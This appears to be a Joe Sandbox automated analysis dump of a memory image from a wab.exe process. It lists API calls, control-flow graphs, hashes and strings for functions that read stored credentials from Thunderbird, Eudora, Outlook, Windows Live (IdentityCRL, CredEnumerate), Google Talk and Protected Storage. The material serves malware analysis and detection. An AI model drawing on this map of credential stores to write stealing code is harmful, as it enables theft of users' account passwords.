                                                            • memset.MSVCRT ref: 00402018
                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                            • _mbscpy.MSVCRT ref: 00402177
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                            • API String ID: 1846531875-4223776976
                                                            • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                            • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$`7<u
                                                            • API String ID: 745651260-3672999695
                                                            • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                            • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                            • _mbscpy.MSVCRT ref: 00403E54
                                                            Strings
                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                            • pstorec.dll, xrefs: 00403C30
                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                            • API String ID: 1197458902-317895162
                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 236 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->236 235->234 237 444c75-444c7e 235->237 246 444d02-444d0d __setusermatherr 236->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 236->247 239 444c80-444c85 237->239 240 444c9f-444ca3 237->240 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 245 444cad-444cb0 241->245 243->234 244 444c95-444c9d 243->244 244->245 245->236 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 256 444d87-444d89 252->256 257 444d8b-444d9c GetStartupInfoA 252->257 253->250 254->251 254->255 255->252 258 444d7d-444d7e 255->258 256->257 256->258 259 444d9e-444da2 257->259 260 444daf-444db1 257->260 258->252 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                            • String ID: kv
                                                            • API String ID: 3662548030-155876773
                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • memcpy.MSVCRT ref: 0040FBE4
                                                            • memcpy.MSVCRT ref: 0040FBF9
                                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                            • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                            • API String ID: 2768085393-2409096184
                                                            • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                            • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                            • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                            • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0044430B
                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                              • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                            • memset.MSVCRT ref: 00444379
                                                            • memset.MSVCRT ref: 00444394
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                            • strlen.MSVCRT ref: 004443DB
                                                            • _strcmpi.MSVCRT ref: 00444401
                                                            Strings
                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                            • Store Root, xrefs: 004443A5
                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                            • API String ID: 832325562-2578778931
                                                            • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                            • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                            APIs
                                                            • memset.MSVCRT ref: 0040F567
                                                            • memset.MSVCRT ref: 0040F57F
                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • memcpy.MSVCRT ref: 0040F652
                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                            • String ID:
                                                            • API String ID: 2012582556-3916222277
                                                            • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                            • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 338 40f96c-40f991 call 4070ae 341 40f993 338->341 342 40f998-40f9ab call 4045db 338->342 341->342 345 40f9b1-40f9bd 342->345 346 40faee-40fafd call 404656 342->346 347 40f9d1 345->347 348 40f9bf-40f9cf CredEnumerateW 345->348 350 40f9d3-40f9d5 347->350 348->350 350->346 352 40f9db-40f9e5 350->352 353 40fae6 352->353 354 40f9eb 352->354 353->346 355 40f9f0-40f9fb 354->355 356 40fa01-40fa04 355->356 357 40fad3-40fae0 355->357 356->357 358 40fa0a-40fa0d 356->358 357->353 357->355 358->357 359 40fa13-40fa3d memset WideCharToMultiByte 358->359 359->357 360 40fa43-40fa59 _strnicmp 359->360 360->357 361 40fa5b-40fa86 WideCharToMultiByte 360->361 362 40fa88-40faa6 WideCharToMultiByte 361->362 363 40faad-40fab4 361->363 362->363 364 40fab6-40facb 363->364 365 40facd-40fad0 363->365 364->357 365->357
                                                            APIs
                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040F9CB
                                                            • memset.MSVCRT ref: 0040FA1E
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                            • _strnicmp.MSVCRT ref: 0040FA4F
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$CredEnumerateVersion_strnicmpmemset
                                                            • String ID: WindowsLive:name=*$windowslive:name=
                                                            • API String ID: 4107456500-3589380929
                                                            • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                            • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                            • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                            • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 367 4037ca-40381c memset * 2 call 444551 370 4038e2-4038e5 367->370 371 403822-403882 call 4021b6 call 406f06 * 2 strchr 367->371 378 403884-403895 _mbscpy 371->378 379 403897-4038a2 strlen 371->379 380 4038bf-4038dd _mbscpy call 4023e5 378->380 379->380 381 4038a4-4038bc sprintf 379->381 380->370 381->380
                                                            APIs
                                                            • memset.MSVCRT ref: 004037EB
                                                            • memset.MSVCRT ref: 004037FF
                                                              • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                              • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                            • strchr.MSVCRT ref: 0040386E
                                                            • _mbscpy.MSVCRT ref: 0040388B
                                                            • strlen.MSVCRT ref: 00403897
                                                            • sprintf.MSVCRT ref: 004038B7
                                                            • _mbscpy.MSVCRT ref: 004038CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                            • String ID: %s@yahoo.com
                                                            • API String ID: 317221925-3288273942
                                                            • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                            • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                            • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                            • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 383 404a99-404ac2 LoadLibraryA 384 404ac4-404ad2 GetProcAddress 383->384 385 404aec-404af4 383->385 386 404ad4-404ad8 384->386 387 404add-404ae6 FreeLibrary 384->387 390 404af5-404afa 385->390 391 404adb 386->391 387->385 389 404ae8-404aea 387->389 389->390 392 404b13-404b17 390->392 393 404afc-404b12 MessageBoxA 390->393 391->387
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                            • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                            • API String ID: 2780580303-317687271
                                                            • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                            • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                            • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                            • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 394 4034e4-403544 memset * 2 call 410b1e 397 403580-403582 394->397 398 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 394->398 398->397
                                                            APIs
                                                            • memset.MSVCRT ref: 00403504
                                                            • memset.MSVCRT ref: 0040351A
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • _mbscpy.MSVCRT ref: 00403555
                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                            • _mbscat.MSVCRT ref: 0040356D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _mbscatmemset$Close_mbscpystrlen
                                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                                            • API String ID: 3071782539-966475738
                                                            • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                            • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 403 40ccd7-40cd06 ??2@YAPAXI@Z 404 40cd08-40cd0d 403->404 405 40cd0f 403->405 406 40cd11-40cd24 ??2@YAPAXI@Z 404->406 405->406 407 40cd26-40cd2d call 404025 406->407 408 40cd2f 406->408 410 40cd31-40cd57 407->410 408->410 412 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 410->412 413 40cd59-40cd60 DeleteObject 410->413 413->412
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                            • String ID:
                                                            • API String ID: 2054149589-0
                                                            • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                            • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                            • memset.MSVCRT ref: 00408620
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • memset.MSVCRT ref: 00408671
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                            • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                            Strings
                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharCloseMulusermeWidestrlen$ComputerEnumOpenUser
                                                            • String ID: Software\Google\Google Talk\Accounts
                                                            • API String ID: 1366857005-1079885057
                                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
